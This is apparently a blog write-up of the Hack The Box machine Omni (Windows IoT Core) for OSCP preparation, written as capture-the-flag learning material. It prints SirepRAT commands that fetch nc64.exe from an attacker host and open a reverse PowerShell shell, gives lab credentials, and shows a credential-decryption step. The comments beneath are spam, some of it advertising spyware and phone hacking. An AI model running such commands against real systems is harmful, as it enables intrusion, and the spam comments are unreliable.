OSCP PREPARATIONS – HTB Omni

Omni is a retired Hack The Box machine running Windows IoT Core. The goal is to obtain the user and root flags by exploiting the vulnerabilities on this machine.
We start with an nmap scan to fingerprint the target.
Classic Scan

Full Port Scan

The port scan shows three open ports: 135/tcp (msrpc, Microsoft Windows RPC), 8080/tcp (reported as upnp / Microsoft IIS httpd) and 5985/tcp (wsman, i.e. WinRM).
We start enumerating port 8080.

The page prompts for credentials (HTTP Basic authentication). We tried the default passwords, but could not log in.
Let's go back to the nmap output and look at what it reported for port 8080:
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn’t have a title.

The realm is Windows Device Portal. Let's Google whether it ships with a default password.

The documented default credentials did not work either. Let's see whether there is a known exploit for this platform.

The search led us to the SirepRAT tool.
SirepRAT abuses the Sirep Test Service that Windows IoT Core exposes on the network; the service accepts commands without any authentication, so the tool gives full RAT capabilities without having to write and drop real RAT malware on the target. I downloaded the tool and ran it.

The built-in help did not make much sense to me at first, but the GitHub repo documents every command in detail.
Here is an example of pulling the hosts file from the target.

The command worked. Since the same LaunchCommandWithOutput primitive can run arbitrary commands, we can use it to download nc onto the target and then run it to get a shell:
1- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args '/c powershell Invoke-WebRequest -OutFile C:\Users\Public\nc64.exe -Uri http://10.10.14.19:8000/nc64.exe' --v

2- python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args '/c dir C:\Users\Public /b'

(We first transferred the 32-bit nc.exe, but it did not run on the target, so we switched to the 64-bit nc64.exe.)
3- python SirepRAT.py --v 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell.exe -command C:\Users\Public\nc64.exe -e powershell.exe 10.10.14.19 4747'

(Before running command 3 we started an nc listener on port 4747 on our machine so the reverse shell has something to connect back to; nc64.exe is served from the web server on port 8000 referenced in command 1.)
Command 1 downloads nc64.exe to C:\Users\Public on the target.
Command 2 lists that directory to confirm nc64.exe arrived.
Command 3 runs nc64.exe to send us a reverse PowerShell.

After getting our shell, we ran "Get-ChildItem -Path C:\ -Filter user.txt -Recurse -ErrorAction SilentlyContinue -Force" and found user.txt under the app user's directory, and we grabbed the file. We could not do anything with the administrator account yet.

The content of the flag file did not look like a flag, so we continue with local enumeration.
We search for .bat files.

One of them contains credentials. Let's try them against the Device Portal on port 8080:
administrator _1nt3rn37ofTh1nGz
app mesh5143
We were able to log in with these credentials.

We continue enumerating through the Device Portal interface.
We checked that the Run Command field actually executes commands, and it does.

Let's get a shell again, this time as the user we are logged in as rather than the default context SirepRAT gave us.
nc64.exe is already under C:\Users\Public, so we launch it from the Run Command field.

We have a shell.

The user and root flag files are not plaintext. Their content is an XML export of a System.Management.Automation.PSCredential object, i.e. the output of Export-Clixml, in which the password is stored as an encrypted SecureString. Let's Google it.
https://www.travisgan.com/2015/06/powershell-password-encryption.html
Following the instructions in that blog post, the credential can be re-imported and the password read back in plaintext:
$UserCred = Import-Clixml -Path C:\data\users\administrator\root.txt
$UserCred.GetNetworkCredential().password
These two commands gave us the root flag.

The same commands failed on user.txt. Export-Clixml protects the SecureString with DPAPI, which ties the encrypted blob to the user who exported it (and to that machine), so administrator cannot decrypt a blob that app exported. We therefore logged into the Device Portal again with the app credentials we found, launched the reverse shell from there, and ran the same Import-Clixml commands against user.txt as app.

This is how we got the user flag
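As an added example (not part of the original walkthrough and not from the SirepRAT project), the script below parses a PSCredential export such as root.txt offline and decodes the header of the DPAPI blob that Export-Clixml stores in the SecureString. It shows why Import-Clixml only works when run as the user who exported the file: unless the CRYPTPROTECT_LOCAL_MACHINE flag is set, the blob is bound to that user's DPAPI master key. The CLIXML document, the master-key GUID and the bytes following the DPAPI header are all constructed for illustration; nothing here is taken from the real flag files.

```python
"""Inspect a PowerShell Export-Clixml PSCredential file offline.

Added example, not code from the original post. A PSCredential exported
with Export-Clixml carries the password as <SS> (SecureString): a hex
string that is a DPAPI blob produced by CryptProtectData in the exporting
user's context. This parser pulls out the user name and the blob, then
reads the fixed DPAPI_BLOB header so you can see which master key (and
therefore which user) is needed to decrypt it.
"""
import struct
import uuid
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
# 4-byte version (1) followed by the DPAPI provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb in its little-endian on-disk form.
DPAPI_SIGNATURE = bytes.fromhex("01000000d08c9ddf0115d1118c7a00c04fc297eb")
CRYPTPROTECT_LOCAL_MACHINE = 0x4  # set when the blob is machine-scoped


def parse_clixml_credential(xml_text: str) -> dict:
    """Return the UserName and the raw SecureString blob from a PSCredential export."""
    root = ET.fromstring(xml_text)
    ns = {"ps": PS_NS}
    obj = root.find("ps:Obj", ns)
    if obj is None:
        raise ValueError("not a CLIXML object export")
    types = [t.text for t in obj.findall("ps:TN/ps:T", ns)]
    if "System.Management.Automation.PSCredential" not in types:
        raise ValueError(f"unexpected object type(s): {types}")
    user = obj.find("ps:Props/ps:S[@N='UserName']", ns)
    secret = obj.find("ps:Props/ps:SS[@N='Password']", ns)
    if user is None or secret is None:
        raise ValueError("missing UserName or Password property")
    return {"username": user.text, "blob": bytes.fromhex(secret.text.strip())}


def describe_dpapi_blob(blob: bytes) -> dict:
    """Decode the fixed part of a DPAPI_BLOB: version, provider, master key, flags."""
    if len(blob) < 48 or not blob.startswith(DPAPI_SIGNATURE):
        raise ValueError("not a DPAPI blob (signature mismatch)")
    (mk_version,) = struct.unpack_from("<I", blob, 20)
    mk_guid = uuid.UUID(bytes_le=blob[24:40])
    flags, desc_len = struct.unpack_from("<II", blob, 40)
    description = blob[48:48 + desc_len].decode("utf-16-le").rstrip("\x00")
    return {
        "master_key_version": mk_version,
        "master_key_guid": str(mk_guid),
        "flags": flags,
        # Without CRYPTPROTECT_LOCAL_MACHINE the master key named above lives
        # in the exporting user's profile, so only that user (or whoever
        # obtains that user's master key) can decrypt the SecureString.
        "user_scoped": not (flags & CRYPTPROTECT_LOCAL_MACHINE),
        "description": description,
    }


def inspect_export(xml_text: str) -> dict:
    """Parse the export and summarise who can decrypt it."""
    cred = parse_clixml_credential(xml_text)
    info = describe_dpapi_blob(cred["blob"])
    info["username"] = cred["username"]
    return info


# Constructed sample: a plausible DPAPI header with a placeholder master-key
# GUID and filler where the real algorithm IDs, salt and ciphertext would be.
SAMPLE_GUID = uuid.UUID("aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee")
SAMPLE_BLOB = (
    DPAPI_SIGNATURE
    + struct.pack("<I", 1)              # master key version
    + SAMPLE_GUID.bytes_le              # master key GUID
    + struct.pack("<II", 0, 2)          # flags (user-scoped), description length
    + b"\x00\x00"                       # empty UTF-16 description
    + bytes(32)                         # filler standing in for the remaining fields
)

SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">flag</S>
      <SS N="Password">{SAMPLE_BLOB.hex()}</SS>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for key, value in inspect_export(SAMPLE_CLIXML).items():
        print(f"{key}: {value}")
```

To use it on a real export, pass the file's text to inspect_export (Windows PowerShell's Export-Clixml writes UTF-16 by default, so decode the file accordingly). A user_scoped result means the decryption has to happen as that user on that host, which is exactly why user.txt had to be read from a shell running as app while root.txt could be read as administrator. The script does not recover the plaintext itself; that still requires the exporting user's DPAPI master key.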

Comments

  1. Jumaane

    You’re so cool! I don’t think I’ve truly read through anything like this before.
    So nice to find somebody with unique thoughts on this subject.
    Seriously.. many thanks for starting this up. This site is one thing that is needed on the
    internet, someone with a bit of originality!

  2. Toribio

    It's like you read my mind! You seem to know so much about
    this, like you wrote the book in it or something. I think that you can do with some pics to drive the
    message home a bit, but instead of that, this is fantastic
    blog. A great read. I’ll definitely be back.

  3. Shahana

    great issues altogether, you simply gained a brand new
    reader. What might you recommend in regards to your post
    that you made some days in the past? Any positive?

  4. Kieu

    Admiring the time and energy you put into your site and detailed information you provide.
    It’s awesome to come across a blog every once in a while that isn’t the same unwanted rehashed material.
    Fantastic read! I’ve bookmarked your site and I’m including your RSS feeds
    to my Google account.

  5. Danen

    I’ll immediately grasp your rss feed as I can’t find your email subscription link or e-newsletter service.

    Do you’ve any? Please permit me know so that
    I may just subscribe. Thanks.

  6. Aeisha

    Thanks for one’s marvelous posting! I certainly enjoyed reading it, you will be a great author. I will remember to bookmark your blog and definitely
    will come back down the road. I want to encourage you to
    continue your great work, have a nice morning!

  7. Rajan

    Heya this is kind of off topic but I was wondering if blogs use WYSIWYG editors or if you have to manually
    code with HTML. I’m starting a blog soon but have no coding experience
    so I wanted to get advice from someone with experience. Any help would be enormously appreciated!

  8. Britiany

    Admiring the time and energy you put into your site and in depth
    information you present. It’s nice to come across a blog every once in a while that isn’t the same out of date rehashed material.
    Excellent read! I’ve bookmarked your site and I’m including your RSS feeds to my Google account.

  9. Annelies

    I just like the valuable information you provide to your articles.
    I will bookmark your blog and take a look at again right here regularly.
    I’m fairly certain I’ll learn lots of new stuff right here!
    Good luck for the next!

  10. Valincia

    This is really interesting, You are a very skilled blogger.
    I have joined your feed and look forward to seeking more of your magnificent post.
    Also, I’ve shared your web site in my social networks!

  11. Kane

    A person necessarily helps to make serious posts, I might state.

    This is the first time I frequented your web page and up to now?
    I’m surprised with the research you made to make this actual post extraordinary.
    Great process!

  12. Emilia

    Hi there! Do you know if they make any plugins to protect
    against hackers? I’m kinda paranoid about losing everything I’ve worked hard on. Any tips?

  13. Joye

    Excellent post. I was checking constantly this weblog and I am impressed!

    Very helpful information specifically the ultimate phase 🙂 I deal with such information much.
    I was looking for this particular info for a
    long time. Thank you and best of luck.

  14. Jesika

    Hey there! I could have sworn I’ve been to this website before but after browsing through some of the
    post I realized it’s new to me. Anyways, I’m definitely delighted I found it and I’ll be
    book-marking and checking back often!

  15. Nyema

    First off I want to say wonderful blog! I had a quick
    question in which I’d like to ask if you don’t mind.
    I was interested to know how you center yourself and clear your thoughts prior to writing.
    I’ve had a difficult time clearing my thoughts in getting my ideas out.
    I do enjoy writing however it just seems like the
    first 10 to 15 minutes are wasted just trying to figure out how to begin. Any suggestions or tips?

    Cheers!

  16. Gage

    You have made some really good points there. I checked on the internet for more
    info about the issue and found most individuals will go along with your views on this web
    site.

  17. Zina

    Hmm is anyone else experiencing problems with the images on this blog loading?

    I’m trying to find out if its a problem on my end or if it’s the blog.
    Any feed-back would be greatly appreciated.

  18. Phone Tracker Free

    When you have doubts about your children’s activities or the safety of their parents, you can hack their Android phones from your computer or mobile device to ensure their safety. No one can monitor around the clock, but there is professional spy software that can secretly monitor the activities of Android phones without making them aware.

  19. Jeffry Sienko

    I know this is off topic but I’m looking into starting my own weblog and was wondering what all is required to get set up? I’m assuming having a blog like yours would cost a pretty penny? I’m not very web smart so I’m not 100% positive. Any tips or advice would be greatly appreciated. Cheers

  20. Sugar Defender

    Thank you for some other fantastic post. The place else may anyone get that type of information in such a perfect approach of writing? I have a presentation subsequent week, and I am on the look for such information.

  21. whatsapp hackers for hire

    I am now not certain where you are getting your information, but good topic. I need to spend a while learning much more or understanding more. Thank you for great information; I used to be on the lookout for this info for my mission.

  22. Sugar defender review

    hi!,I really like your writing very much! percentage we keep up a correspondence extra approximately your post on AOL? I need a specialist in this house to resolve my problem. Maybe that’s you! Having a look forward to peer you.

  23. Fitspresso reviews

    Can I simply say what a relief to seek out somebody who really is aware of what they’re speaking about on the internet. You positively know the right way to deliver a difficulty to light and make it important. Extra people need to learn this and understand this side of the story. I can’t imagine you’re not more popular since you positively have the gift.

  24. phone hackers for hire

    Hi, just required you to know I have added your site to my Google bookmarks due to your layout. But seriously, I believe your internet site has one of the freshest themes I’ve come across. It extremely helps make reading your blog significantly easier.
